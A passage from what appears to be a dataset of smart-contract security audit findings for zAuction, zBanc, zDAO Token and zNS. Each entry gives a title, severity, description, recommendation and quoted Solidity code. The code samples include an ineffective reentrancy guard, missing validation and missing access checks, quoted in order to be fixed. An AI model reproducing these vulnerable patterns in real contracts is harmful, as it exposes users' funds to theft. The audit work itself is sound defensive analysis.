mainnet.\\n```\\n IERC20 weth = IERC20(address(0xc778417E063141139Fce010982780140Aa0cD5Ab)); // rinkeby weth\\n```\\nчResolution\\nAddressed with zer0-os/[email protected]135b2aa and the following statement:\\n5.30 weth address in constructor\\nNote: does not perform input validation as recommended\\nConsider taking the used `WETH` token address as a constructor argument. Avoid code changes to facilitate testing! Perform input validation on arguments rejecting `address(0x0)` to facilitate the detection of potential misconfiguration in the deployment pipeline.чч```\\n IERC20 weth = IERC20(address(0xc778417E063141139Fce010982780140Aa0cD5Ab)); // rinkeby weth\\n```\\n -zAuction - accountant allows zero value withdrawals/deposits/exchangeчlowчZero value transfers effectively perform a no-operation sometimes followed by calling out to the recipient of the withdrawal.\\nA transfer where `from==to` or where the value is `0` is ineffective.\\n```\\nfunction Withdraw(uint256 amount) external {\\n ethbalance[msg.sender] = SafeMath.sub(ethbalance[msg.sender], amount);\\n payable(msg.sender).transfer(amount);\\n emit Withdrew(msg.sender, amount);\\n}\\n```\\n\\n```\\nfunction Deposit() external payable {\\n ethbalance[msg.sender] = SafeMath.add(ethbalance[msg.sender], msg.value);\\n emit Deposited(msg.sender, msg.value);\\n}\\n```\\n\\n```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n\\n function Exchange(address from, address to, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n ethbalance[to] = SafeMath.add(ethbalance[to], amount);\\n emit zExchanged(from, to, amount);\\n }\\n```\\nчConsider rejecting ineffective withdrawals (zero value) or at least avoid issuing a zero value `ETH` transfers. Avoid emitting successful events for ineffective calls to not trigger 3rd party components on noop's.чч```\\nfunction Withdraw(uint256 amount) external {\\n ethbalance[msg.sender] = SafeMath.sub(ethbalance[msg.sender], amount);\\n payable(msg.sender).transfer(amount);\\n emit Withdrew(msg.sender, amount);\\n}\\n```\\n -zAuction - seller should not be able to accept their own bidчlowчA seller can accept their own bid which is an ineffective action that is emitting an event.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n\\n/// @dev 'true' in the hash here is the eth/weth switch\\nfunction acceptWethBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid, true))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n weth.transferFrom(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit WethBidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\nчDisallow transfers to self.чч```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n\\n/// @dev 'true' in the hash here is the eth/weth switch\\nfunction acceptWethBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid, true))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n weth.transferFrom(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit WethBidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n -zBanc - DynamicLiquidTokenConverter ineffective reentrancy protectionчhighч`reduceWeight` calls `_protected()` in an attempt to protect from reentrant calls but this check is insufficient as it will only check for the `locked` statevar but never set it. A potential for direct reentrancy might be present when an erc-777 token is used as reserve.\\nIt is assumed that the developer actually wanted to use the `protected` modifier that sets the lock before continuing with the method.\\n```\\nfunction reduceWeight(IERC20Token \\_reserveToken)\\n public\\n validReserve(\\_reserveToken)\\n ownerOnly\\n{\\n \\_protected();\\n```\\n\\n```\\ncontract ReentrancyGuard {\\n // true while protected code is being executed, false otherwise\\n bool private locked = false;\\n\\n /\\*\\*\\n \\* @dev ensures instantiation only by sub-contracts\\n \\*/\\n constructor() internal {}\\n\\n // protects a function against reentrancy attacks\\n modifier protected() {\\n \\_protected();\\n locked = true;\\n \\_;\\n locked = false;\\n }\\n\\n // error message binary size optimization\\n function \\_protected() internal view {\\n require(!locked, \"ERR\\_REENTRANCY\");\\n }\\n}\\n```\\nчTo mitigate potential attack vectors from reentrant calls remove the call to `_protected()` and decorate the function with `protected` instead. This will properly set the lock before executing the function body rejecting reentrant calls.чч```\\nfunction reduceWeight(IERC20Token \\_reserveToken)\\n public\\n validReserve(\\_reserveToken)\\n ownerOnly\\n{\\n \\_protected();\\n```\\n -zBanc - DynamicLiquidTokenConverter input validationчmediumчCheck that the value in `PPM` is within expected bounds before updating system settings that may lead to functionality not working correctly. For example, setting out-of-bounds values for `stepWeight` or `setMinimumWeight` may make calls to `reduceWeight` fail. These values are usually set in the beginning of the lifecycle of the contract and misconfiguration may stay unnoticed until trying to reduce the weights. The settings can be fixed, however, by setting the contract inactive and updating it with valid settings. Setting the contract to inactive may temporarily interrupt the normal operation of the contract which may be unfavorable.\\nBoth functions allow the full `uint32` range to be used, which, interpreted as `PPM` would range from `0%` to `4.294,967295%`\\n```\\nfunction setMinimumWeight(uint32 \\_minimumWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_minimumWeight > 0, \"Min weight 0\");\\n //\\_validReserveWeight(\\_minimumWeight);\\n minimumWeight = \\_minimumWeight;\\n emit MinimumWeightUpdated(\\_minimumWeight);\\n}\\n```\\n\\n```\\nfunction setStepWeight(uint32 \\_stepWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_stepWeight > 0, \"Step weight 0\");\\n //\\_validReserveWeight(\\_stepWeight);\\n stepWeight = \\_stepWeight;\\n emit StepWeightUpdated(\\_stepWeight);\\n}\\n```\\nчReintroduce the checks for `_validReserveWeight` to check that a percent value denoted in `PPM` is within valid bounds `_weight > 0 && _weight <= PPM_RESOLUTION`. There is no need to separately check for the value to be `>0` as this is already ensured by `_validReserveWeight`.\\nNote that there is still room for misconfiguration (step size too high, min-step too high), however, this would at least allow to catch obviously wrong and often erroneously passed parameters early.чч```\\nfunction setMinimumWeight(uint32 \\_minimumWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_minimumWeight > 0, \"Min weight 0\");\\n //\\_validReserveWeight(\\_minimumWeight);\\n minimumWeight = \\_minimumWeight;\\n emit MinimumWeightUpdated(\\_minimumWeight);\\n}\\n```\\n -zBanc - DynamicLiquidTokenConverter introduces breaking changes to the underlying bancorprotocol baseчmediumчIntroducing major changes to the complex underlying smart contract system that zBanc was forked from(bancorprotocol) may result in unnecessary complexity to be added. Complexity usually increases the attack surface and potentially introduces software misbehavior. Therefore, it is recommended to focus on reducing the changes to the base system as much as possible and comply with the interfaces and processes of the system instead of introducing diverging behavior.\\nFor example, `DynamicLiquidTokenConverterFactory` does not implement the `ITypedConverterFactory` while other converters do. Furthermore, this interface and the behavior may be expected to only perform certain tasks e.g. when called during an upgrade process. Not adhering to the base systems expectations may result in parts of the system failing to function for the new convertertype. Changes introduced to accommodate the custom behavior/interfaces may result in parts of the system failing to operate with existing converters. This risk is best to be avoided.\\nIn the case of `DynamicLiquidTokenConverterFactory` the interface is imported but not implemented at all (unused import). The reason for this is likely because the function `createConverter` in `DynamicLiquidTokenConverterFactory` does not adhere to the bancor-provided interface anymore as it is doing way more than “just” creating and returning a new converter. This can create problems when trying to upgrade the converter as the upgraded expected the shared interface to be exposed unless the update mechanisms are modified as well.\\nIn general, the factories `createConverter` method appears to perform more tasks than comparable type factories. It is questionable if this is needed but may be required by the design of the system. We would, however, highly recommend to not diverge from how other converters are instantiated unless it is required to provide additional security guarantees (i.e. the token was instantiated by the factory and is therefore trusted).\\nThe `ConverterUpgrader` changed in a way that it now can only work with the `DynamicLiquidTokenconverter` instead of the more generalized `IConverter` interface. This probably breaks the update for all other converter types in the system.\\nThe severity is estimated to be medium based on the fact that the development team seems to be aware of the breaking changes but the direction of the design of the system was not yet decided.\\nunused import\\nconverterType should be external as it is not called from within the same or inherited contracts\\n```\\nfunction converterType() public pure returns (uint16) {\\n return 3;\\n}\\n```\\n\\ncreateToken can be external and is actually creating a token and converter that is using that token (the converter is not returned)(consider renaming to createTokenAndConverter)\\n```\\n{\\n DSToken token = new DSToken(\\_name, \\_symbol, \\_decimals);\\n\\n token.issue(msg.sender, \\_initialSupply);\\n\\n emit NewToken(token);\\n\\n createConverter(\\n token,\\n \\_reserveToken,\\n \\_reserveWeight,\\n \\_reserveBalance,\\n \\_registry,\\n \\_maxConversionFee,\\n \\_minimumWeight,\\n \\_stepWeight,\\n \\_marketCapThreshold\\n );\\n\\n return token;\\n}\\n```\\n\\nthe upgrade interface changed and now requires the converter to be a `DynamicLiquidTokenConverter`. Other converters may potentially fail to upgrade unless they implement the called interfaces.\\n```\\n function upgradeOld(DynamicLiquidTokenConverter \\_converter, bytes32 \\_version) public {\\n \\_version;\\n DynamicLiquidTokenConverter converter = DynamicLiquidTokenConverter(\\_converter);\\n address prevOwner = converter.owner();\\n acceptConverterOwnership(converter);\\n DynamicLiquidTokenConverter newConverter = createConverter(converter);\\n \\n copyReserves(converter, newConverter);\\n copyConversionFee(converter, newConverter);\\n transferReserveBalances(converter, newConverter);\\n IConverterAnchor anchor = converter.token();\\n \\n // get the activation status before it's being invalidated\\n bool activate = isV28OrHigherConverter(converter) && converter.isActive();\\n \\n if (anchor.owner() == address(converter)) {\\n converter.transferTokenOwnership(address(newConverter));\\n newConverter.acceptAnchorOwnership();\\n }\\n\\n handleTypeSpecificData(converter, newConverter, activate);\\n converter.transferOwnership(prevOwner);\\n \\n newConverter.transferOwnership(prevOwner);\\n \\n emit ConverterUpgrade(address(converter), address(newConverter));\\n }\\n```\\n\\n```\\nfunction upgradeOld(\\n IConverter \\_converter,\\n bytes32 /\\* \\_version \\*/\\n) public {\\n // the upgrader doesn't require the version for older converters\\n upgrade(\\_converter, 0);\\n}\\n```\\nчIt is a fundamental design decision to either follow the bancorsystems converter API or diverge into a more customized system with a different design, functionality, or even security assumptions. From the current documentation, it is unclear which way the development team wants to go.\\nHowever, we highly recommend re-evaluating whether the newly introduced type and components should comply with the bancor API (recommended; avoid unnecessary changes to the underlying system,) instead of changing the API for the new components. Decide if the new factory should adhere to the usually commonly shared `ITypedConverterFactory` (recommended) and if not, remove the import and provide a new custom shared interface. It is highly recommended to comply and use the bancor systems extensibility mechanisms as intended, keeping the previously audited bancor code in-tact and voiding unnecessary re-assessments of the security impact of changes.чч```\\nfunction converterType() public pure returns (uint16) {\\n return 3;\\n}\\n```\\n -zBanc - DynamicLiquidTokenConverter isActive should only be returned if converter is fully configured and converter parameters should only be updateable while converter is inactiveчmediumчBy default, a converter is `active` once the anchor ownership was transferred. This is true for converters that do not require to be properly set up with additional parameters before they can be used.\\n```\\n/\\*\\*\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view virtual override returns (bool) {\\n return anchor.owner() == address(this);\\n}\\n```\\n\\nFor a simple converter, this might be sufficient. If a converter requires additional setup steps (e.g. setting certain internal variables, an oracle, limits, etc.) it should return `inactive` until the setup completes. This is to avoid that users are interacting with (or even pot. frontrunning) a partially configured converter as this may have unexpected outcomes.\\nFor example, the `LiquidityPoolV2Converter` overrides the `isActive` method to require additional variables be set (oracle) to actually be in `active` state.\\n```\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view override returns (bool) {\\n return super.isActive() && address(priceOracle) != address(0);\\n}\\n```\\n\\nAdditionally, settings can only be updated while the contract is `inactive` which will be the case during an upgrade. This ensures that the `owner` cannot adjust settings at will for an active contract.\\n```\\nfunction activate(\\n IERC20Token \\_primaryReserveToken,\\n IChainlinkPriceOracle \\_primaryReserveOracle,\\n IChainlinkPriceOracle \\_secondaryReserveOracle)\\n public\\n inactive\\n ownerOnly\\n validReserve(\\_primaryReserveToken)\\n notThis(address(\\_primaryReserveOracle))\\n notThis(address(\\_secondaryReserveOracle))\\n validAddress(address(\\_primaryReserveOracle))\\n validAddress(address(\\_secondaryReserveOracle))\\n{\\n```\\n\\nThe `DynamicLiquidTokenConverter` is following a different approach. It inherits the default `isActive` which sets the contract active right after anchor ownership is transferred. This kind of breaks the upgrade process for `DynamicLiquidTokenConverter` as settings cannot be updated while the contract is active (as anchor ownership might be transferred before updating values). To unbreak this behavior a new authentication modifier was added, that allows updates for the upgrade contradict while the contract is active. Now this is a behavior that should be avoided as settings should be predictable while a contract is active. Instead it would make more sense initially set all the custom settings of the converter to zero (uninitialized) and require them to be set and only the return the contract as active. The behavior basically mirrors the upgrade process of `LiquidityPoolV2Converter`.\\n```\\n modifier ifActiveOnlyUpgrader(){\\n if(isActive()){\\n require(owner == addressOf(CONVERTER\\_UPGRADER), \"ERR\\_ACTIVE\\_NOTUPGRADER\");\\n }\\n \\_;\\n }\\n```\\n\\nPre initialized variables should be avoided. The marketcap threshold can only be set by the calling entity as it may be very different depending on the type of reserve (eth, token).\\n```\\nuint32 public minimumWeight = 30000;\\nuint32 public stepWeight = 10000;\\nuint256 public marketCapThreshold = 10000 ether;\\nuint256 public lastWeightAdjustmentMarketCap = 0;\\n```\\n\\nHere's one of the setter functions that can be called while the contract is active (only by the upgrader contract but changing the ACL commonly followed with other converters).\\n```\\nfunction setMarketCapThreshold(uint256 \\_marketCapThreshold)\\n public\\n ownerOnly\\n ifActiveOnlyUpgrader\\n{\\n marketCapThreshold = \\_marketCapThreshold;\\n emit MarketCapThresholdUpdated(\\_marketCapThreshold);\\n}\\n```\\nчAlign the upgrade process as much as possible to how `LiquidityPoolV2Converter` performs it. Comply with the bancor API.\\noverride `isActive` and require the contracts main variables to be set.\\ndo not pre initialize the contracts settings to “some” values. Require them to be set by the caller (and perform input validation)\\nmirror the upgrade process of `LiquidityPoolV2Converter` and instead of `activate` call the setter functions that set the variables. After setting the last var and anchor ownership been transferred, the contract should return active.чч```\\n/\\*\\*\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view virtual override returns (bool) {\\n return anchor.owner() == address(this);\\n}\\n```\\n -zBanc - inconsistent DynamicContractRegistry, admin risksчmediumч`DynamicContractRegistry` is a wrapper registry that allows the zBanc to use the custom upgrader contract while still providing access to the normal bancor registry.\\nFor this to work, the registry owner can add or override any registry setting. Settings that don't exist in this contract are attempted to be retrieved from an underlying registry (contractRegistry).\\n```\\nfunction registerAddress(bytes32 \\_contractName, address \\_contractAddress)\\n public\\n ownerOnly\\n validAddress(\\_contractAddress)\\n{\\n```\\n\\nIf the item does not exist in the registry, the request is forwarded to the underlying registry.\\n```\\nfunction addressOf(bytes32 \\_contractName) public view override returns (address) {\\n if(items[\\_contractName].contractAddress != address(0)){\\n return items[\\_contractName].contractAddress;\\n }else{\\n return contractRegistry.addressOf(\\_contractName);\\n }\\n}\\n```\\n\\nAccording to the documentation this registry is owned by zer0 admins and this means users have to trust zer0 admins to play fair.\\nTo handle this, we deploy our own ConverterUpgrader and ContractRegistry owned by zer0 admins who can register new addresses\\nThe owner of the registry (zer0 admins) can change the underlying registry contract at will. The owner can also add new or override any settings that already exist in the underlying registry. This may for example allow a malicious owner to change the upgrader contract in an attempt to potentially steal funds from a token converter or upgrade to a new malicious contract. The owner can also front-run registry calls changing registry settings and thus influencing the outcome. Such an event will not go unnoticed as events are emitted.\\nIt should also be noted that `itemCount` will return only the number of items in the wrapper registry but not the number of items in the underlying registry. This may have an unpredictable effect on components consuming this information.\\n```\\n/\\*\\*\\n \\* @dev returns the number of items in the registry\\n \\*\\n \\* @return number of items\\n\\*/\\nfunction itemCount() public view returns (uint256) {\\n return contractNames.length;\\n}\\n```\\nчResolution\\nThe client acknowledged the admin risk and addressed the `itemCount` concerns by exposing another method that only returns the overridden entries. The following statement was provided:\\n5.10 - keeping this pattern which matches the bancor pattern, and noting the DCR should be owned by a DAO, which is our plan. solved itemCount issue - Added dcrItemCount and made itemCount call the bancor registry's itemCount, so unpredictable behavior due to the count should be eliminated.\\nRequire the owner/zer0 admins to be a DAO or multisig and enforce 2-step (notify->wait->upgrade) registry updates (e.g. by requiring voting or timelocks in the admin contract). Provide transparency about who is the owner of the registry as this may not be clear for everyone. Evaluate the impact of `itemCount` only returning the number of settings in the wrapper not taking into account entries in the subcontract (including pot. overlaps).чч```\\nfunction registerAddress(bytes32 \\_contractName, address \\_contractAddress)\\n public\\n ownerOnly\\n validAddress(\\_contractAddress)\\n{\\n```\\n -zBanc - DynamicLiquidTokenConverter consider using PPM_RESOLUTION instead of hardcoding integer literalsчlowч`getMarketCap` calculates the reserve's market capitalization as `reserveBalance * `1e6` / weight` where `1e6` should be expressed as the constant `PPM_RESOLUTION`.\\n```\\nfunction getMarketCap(IERC20Token \\_reserveToken)\\n public\\n view\\n returns(uint256)\\n{\\n Reserve storage reserve = reserves[\\_reserveToken];\\n return reserveBalance(\\_reserveToken).mul(1e6).div(reserve.weight);\\n}\\n```\\nчAvoid hardcoding integer literals directly into source code when there is a better expression available. In this case `1e6` is used because weights are denoted in percent to base `PPM_RESOLUTION` (=100%).чч```\\nfunction getMarketCap(IERC20Token \\_reserveToken)\\n public\\n view\\n returns(uint256)\\n{\\n Reserve storage reserve = reserves[\\_reserveToken];\\n return reserveBalance(\\_reserveToken).mul(1e6).div(reserve.weight);\\n}\\n```\\n -zBanc - DynamicLiquidTokenConverter avoid potential converter type overlap with bancor AcknowledgedчlowчThe system is forked frombancorprotocol/contracts-solidity. As such, it is very likely that security vulnerabilities reported to bancorprotocol upstream need to be merged into the zer0/zBanc fork if they also affect this codebase. There is also a chance that security fixes will only be available with feature releases or that the zer0 development team wants to merge upstream features into the zBanc codebase.\\nzBanc introduced `converterType=3` for the `DynamicLiquidTokenConverter` as `converterType=1` and `converterType=2` already exist in the bancorprotocol codebase. Now, since it is unclear if `DynamicLiquidTokenConverter` will be merged into bancorprotocol there is a chance that bancor introduces new types that overlap with the `DynamicLiquidTokenConverter` converter type (3). It is therefore suggested to map the `DynamicLiquidTokenConverter` to a converterType that is unlikely to create an overlap with the system it was forked from. E.g. use converter type id `1001` instead of `3` (Note: converterType is an uint16).\\nNote that the current master of the bancorprotocol already appears to defined converterType 3 and 4: https://github.com/bancorprotocol/contracts-solidity/blob/5f4c53ebda784751c3a90b06aa2c85e9fdb36295/solidity/test/helpers/Converter.js#L51-L54\\nThe new custom converter\\n```\\nfunction converterType() public pure override returns (uint16) {\\n return 3;\\n}\\n```\\n\\nConverterTypes from the bancor base system\\n```\\nfunction converterType() public pure override returns (uint16) {\\n return 1;\\n}\\n```\\n\\n```\\n\\*/\\nfunction converterType() public pure override returns (uint16) {\\n return 2;\\n}\\n```\\nчChoose a converterType id for this custom implementation that does not overlap with the codebase the system was forked from. e.g. `uint16(-1)` or `1001` instead of `3` which might already be used upstream.чч```\\nfunction converterType() public pure override returns (uint16) {\\n return 3;\\n}\\n```\\n -zDAO Token - Specification violation - Snapshots are never taken Partially AddressedчhighчResolution\\nAddressed with zer0-os/[email protected]81946d4 by exposing the `_snapshot()` method to a dedicated snapshot role (likely to be a DAO) and the owner of the contract.\\nWe would like to note that we informed the client that depending on how the snapshot method is used and how predictably snapshots are consumed this might open up a frontrunning vector where someone observing that a `_snapshot()` is about to be taken might sandwich the snapshot call, accumulate a lot of stake (via 2nd markets, lending platforms), and returning it right after it's been taken. The risk of losing funds may be rather low (especially if performed by a miner) and the benefit from a DAO proposal using this snapshot might outweigh it. It is still recommended to increase the number of snapshots taken or take them on a regular basis (e.g. with every first transaction to the contract in a block) to make it harder to sandwich the snapshot taking.\\nAccording to the zDAO Token specification the DAO token should implement a snapshot functionality to allow it being used for DAO governance votings.\\nAny transfer, mint, or burn operation should result in a snapshot of the token balances of involved users being taken.\\nWhile the corresponding functionality is implemented and appears to update balances for snapshots, `_snapshot()` is never called, therefore, the snapshot is never taken. e.g. attempting to call `balanceOfAt` always results in an error as no snapshot is available.\\n```\\ncontract ZeroDAOToken is\\n OwnableUpgradeable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20SnapshotUpgradeable\\n{\\n```\\n\\n```\\n\\_updateAccountSnapshot(sender);\\n```\\n\\nNote that this is an explicit requirement as per specification but unit tests do not seem to attempt calls to `balanceOfAt` at all.чActually, take a snapshot by calling `_snapshot()` once per block when executing the first transaction in a new block. Follow the openzeppeling documentation for ERC20Snapshot.чч```\\ncontract ZeroDAOToken is\\n OwnableUpgradeable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20SnapshotUpgradeable\\n{\\n```\\n -zDAO-Token - Revoking vesting tokens right before cliff period expiration might be delayed/front-runnedчlowчThe owner of `TokenVesting` contract has the right to revoke the vesting of tokens for any `beneficiary`. By doing so, the amount of tokens that are already vested and weren't released yet are being transferred to the `beneficiary`, and the rest are being transferred to the owner. The `beneficiary` is expected to receive zero tokens in case the revocation transaction was executed before the cliff period is over. Although unlikely, the `beneficiary` may front run this revocation transaction by delaying the revocation (and) or inserting a release transaction right before that, thus withdrawing the vested amount.\\n```\\nfunction release(address beneficiary) public {\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n require(unreleased > 0, \"Nothing to release\");\\n\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n award.released += unreleased;\\n\\n targetToken.safeTransfer(beneficiary, unreleased);\\n\\n emit Released(beneficiary, unreleased);\\n}\\n\\n/\\*\\*\\n \\* @notice Allows the owner to revoke the vesting. Tokens already vested\\n \\* are transfered to the beneficiary, the rest are returned to the owner.\\n \\* @param beneficiary Who the tokens are being released to\\n \\*/\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, \"Cannot be revoked\");\\n require(!award.revoked, \"Already revoked\");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\nчThe issue described above is possible, but very unlikely. However, the `TokenVesting` owner should be aware of that, and make sure not to revoke vested tokens closely to cliff period ending.чч```\\nfunction release(address beneficiary) public {\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n require(unreleased > 0, \"Nothing to release\");\\n\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n award.released += unreleased;\\n\\n targetToken.safeTransfer(beneficiary, unreleased);\\n\\n emit Released(beneficiary, unreleased);\\n}\\n\\n/\\*\\*\\n \\* @notice Allows the owner to revoke the vesting. Tokens already vested\\n \\* are transfered to the beneficiary, the rest are returned to the owner.\\n \\* @param beneficiary Who the tokens are being released to\\n \\*/\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, \"Cannot be revoked\");\\n require(!award.revoked, \"Already revoked\");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n -zDAO-Token - Vested tokens revocation depends on claiming stateчlowчThe owner of the `TokenVesting` contract can revoke the vesting of tokens for any beneficiary by calling `TokenVesting.revoke` only for tokens that have already been claimed using `MerkleTokenVesting.claimAward`. Although anyone can call `MerkleTokenVesting.claimAward` for a given beneficiary, in practice it is mostly the beneficiary's responsibility. This design decision, however, incentivizes the beneficiary to delay the call to `MerkleTokenVesting.claimAward` up to the point when he wishes to cash out, to avoid potential revocation. To revoke vesting tokens the owner will have to claim the award on the beneficiary's behalf first (which might be a gas burden), then call `TokenVesting.revoke`.\\n```\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, \"Cannot be revoked\");\\n require(!award.revoked, \"Already revoked\");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\nчMake sure that the potential owner of a `TokenVesting` contract is aware of this potential issue, and has the required processes in place to handle it.чч```\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, \"Cannot be revoked\");\\n require(!award.revoked, \"Already revoked\");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n -zNS - Domain bid might be approved by non owner accountчhighчThe spec allows anyone to place a bid for a domain, while only parent domain owners are allowed to approve a bid. Bid placement is actually enforced and purely informational. In practice, `approveDomainBid` allows any parent domain owner to approve bids (signatures) for any other domain even if they do not own it. Once approved, anyone can call `fulfillDomainBid` to create a domain.\\n```\\nfunction approveDomainBid(\\n uint256 parentId,\\n string memory bidIPFSHash,\\n bytes memory signature\\n) external authorizedOwner(parentId) {\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n approvedBids[hashOfSig] = true;\\n emit DomainBidApproved(bidIPFSHash);\\n}\\n```\\nчResolution\\nAddressed with zer0-os/[email protected] by storing the domain request data on-chain.\\nConsider adding a validation check that allows only the parent domain owner to approve bids on one of its domains. Reconsider the design of the system introducing more on-chain guarantees for bids.чч```\\nfunction approveDomainBid(\\n uint256 parentId,\\n string memory bidIPFSHash,\\n bytes memory signature\\n) external authorizedOwner(parentId) {\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n approvedBids[hashOfSig] = true;\\n emit DomainBidApproved(bidIPFSHash);\\n}\\n```\\n -zAuction, zNS - Bids cannot be cancelled, never expire, and the auction lifecycle is unclearчhighчThe lifecycle of a bid both for `zAuction` and `zNS` is not clear, and has many flaws.\\n`zAuction` - Consider the case where a bid is placed, then the underlying asset in being transferred to a new owner. The new owner can now force to sell the asset even though it's might not be relevant anymore.\\n`zAuction` - Once a bid was accepted and the asset was transferred, all other bids need to be invalidated automatically, otherwise and old bid might be accepted even after the formal auction is over.\\n`zAuction`, `zNS` - There is no way for the bidder to cancel an old bid. That might be useful in the event of a significant change in market trend, where the old pricing is no longer relevant. Currently, in order to cancel a bid, the bidder can either withdraw his ether balance from the `zAuctionAccountant`, or disapprove `WETH` which requires an extra transaction that might be front-runned by the seller.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n 